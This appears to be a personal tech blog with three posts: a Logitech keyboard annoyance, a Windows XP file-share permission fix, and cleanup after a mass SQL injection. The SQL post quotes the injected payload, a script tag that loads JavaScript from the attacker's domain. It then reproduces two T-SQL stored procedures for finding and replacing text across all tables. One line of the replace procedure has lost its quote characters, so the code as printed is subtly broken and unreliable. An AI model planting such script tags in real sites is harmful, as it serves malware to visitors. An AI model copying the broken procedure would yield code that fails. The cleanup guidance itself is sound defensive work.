A couple of months ago, the cordless mouse in my 18 month Logitech Desktop MX3000 set finally got to me with it’s broken clicker, and a quick call to Logitech sorted it out.
Customer service was excellent. The call took about 5 minutes, got an RMA number, sent off the damaged mouse and receiver, and a week later I had a brand new MX3200 cordless desktop to replace the now-obsolete MX3000.
I’m generally a fan of Logitech products, but don’t know what the deal is with all of these fancy media buttons on their newer keyboards, which seems to be getting worse with each model. My first frustration was with the resized F keys (which are used quite a lot in VS.NET for shortcuts, etc), though this isn’t too bad once you get used to it.
But the most annoying feature had to be the zoom bar on the left hand side of the keyboard:
As some other reviewers on Amazon.com have noted (though many don’t agree), this feature can be easily activated, and cause your browser text to quickly size up to a ridiculously large font-size through a misplaced finger during random browsing. After find nothing searching through Logitech setpoint for a way to disable this feature, and no useful information Googling for answers, there turned out to be a much simpler solution:
That’s right, covering the annoying zoom bar using a piece of paper (or in this case, an old receipt) and some sticky tape.
Sometimes the quickest and easiest solution really is a low-tech one (though perhaps it doesn’t look the best!)
About a week ago, my Windows XP Pro x64 machine randomly stopped allowing network access to file shares. The guest account was enabled, but any access to \\machinename from other machines on the network showed the following error:
Logon Failure: the user has not been granted the requested logon type
The quickest solution for this was to do the following:
- Go to start – settings – control panel – administrative tools
- Go to Local Security Policy
- Expand the Local Policies node
- Expand the User Rights Assignment node
- Double click on the Deny access to this computer from the network node in the right hand pane
- Click on Guest in the properties window that opens up
- Click Remove
- Click OK
Not sure why this randomly stopped working, but all seems well now.
Recently, a client’s website got affected by the ADW95.com SQL injection attack, which is also known as Banner82 or Direct84. This exploit seems to modify the database, and add the following (or something similar) to all text fields of all tables in the database:
<script src=http://www.adw95.com/b.js></script>
However, it seems somewhat random, with some tables seemingly fine, and others affected. In many cases, it actually gets appended several times, and often becomes an invalid tag, like something below:
<scr<scriptsrc=http://adw95.com/b.js></sc</script>
This seems like a common explot; searching Google for adw95/b.js returns 248,000 results, with all the sites looking like they have been hit with this.
There’s a great post by John Forsythe, who was hit with the same exploit, detailing how he got rid of this foreign text. The primary tools for cleaning up are a couple of very useful stored procedures for finding and finding and replacing strings across all fields in a database. I’ve included these below:
Finding text in all fields in all tables:
CREATE PROC SearchAllTables
(
@SearchStr nvarchar(100)
)
AS
BEGIN
-- Copyright © 2002 Narayana Vyas Kondreddi. All rights reserved.
-- Purpose: To search all columns of all tables for a given search string
-- Written by: Narayana Vyas Kondreddi
-- Site: http://vyaskn.tripod.com
-- Tested on: SQL Server 7.0 and SQL Server 2000
-- Date modified: 28th July 2002 22:50 GMT
CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))
SET NOCOUNT ON
DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)
SET @TableName = ''
SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')
WHILE @TableName IS NOT NULL
BEGIN
SET @ColumnName = ''
SET @TableName =
(
SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
AND OBJECTPROPERTY(
OBJECT_ID(
QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
), 'IsMSShipped'
) = 0
)
WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
BEGIN
SET @ColumnName =
(
SELECT MIN(QUOTENAME(COLUMN_NAME))
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = PARSENAME(@TableName, 2)
AND TABLE_NAME = PARSENAME(@TableName, 1)
AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
AND QUOTENAME(COLUMN_NAME) > @ColumnName
)
IF @ColumnName IS NOT NULL
BEGIN
INSERT INTO #Results
EXEC
(
'SELECT ' + @TableName + '.' + @ColumnName + ', LEFT(' + @ColumnName + ', 3630)
FROM ' + @TableName + ' (NOLOCK) ' +
' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
)
END
END
END
SELECT ColumnName, ColumnValue FROM #Results
END
Find and replace text in all fields in all tables:
CREATE PROC SearchAndReplace
(
@SearchStr nvarchar(100),
@ReplaceStr nvarchar(100)
)
AS
BEGIN
-- Copyright © 2002 Narayana Vyas Kondreddi. All rights reserved.
-- Purpose: To search all columns of all tables for a given search string and replace it with another string
-- Written by: Narayana Vyas Kondreddi
-- Site: http://vyaskn.tripod.com
-- Tested on: SQL Server 7.0 and SQL Server 2000
-- Date modified: 2nd November 2002 13:50 GMT
SET NOCOUNT ON
DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110), @SQL nvarchar(4000), @RCTR int
SET @TableName = ''
SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')
SET @RCTR = 0
WHILE @TableName IS NOT NULL
BEGIN
SET @ColumnName = ''
SET @TableName =
(
SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
AND OBJECTPROPERTY(
OBJECT_ID(
QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
), 'IsMSShipped'
) = 0
)
WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
BEGIN
SET @ColumnName =
(
SELECT MIN(QUOTENAME(COLUMN_NAME))
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = PARSENAME(@TableName, 2)
AND TABLE_NAME = PARSENAME(@TableName, 1)
AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
AND QUOTENAME(COLUMN_NAME) > @ColumnName
)
IF @ColumnName IS NOT NULL
BEGIN
SET @SQL= 'UPDATE ' + @TableName +
' SET ' + @ColumnName
+ ' = REPLACE(' + @ColumnName + ', '
+ QUOTENAME(@SearchStr, ') + ', ' + QUOTENAME(@ReplaceStr, ') +
') WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
EXEC (@SQL)
SET @RCTR = @RCTR + @@ROWCOUNT
END
END
END
SELECT 'Replaced ' + CAST(@RCTR AS varchar) + ' occurence(s)' AS 'Outcome'
END
To clean up the mess, first execute the following to find all of the injected text:
EXEC SearchAllTables ‘<script’
This will return a table of all field names and their values containing the specified text. You’ll then need to run the SearchAndReplace stored procedure for each instance of the foreign text. In my case, I had about 200 affected rows and had to run the stored procedure about 25 times to get rid of all of them.
It’s likely that some data will also be corrupted both by exploit and during the cleanup process, and may not be recoverable.
ZDNet has more information about this exploit in the article, Fast-Fluxing SQL injection attacks executed from the Asprox botnet.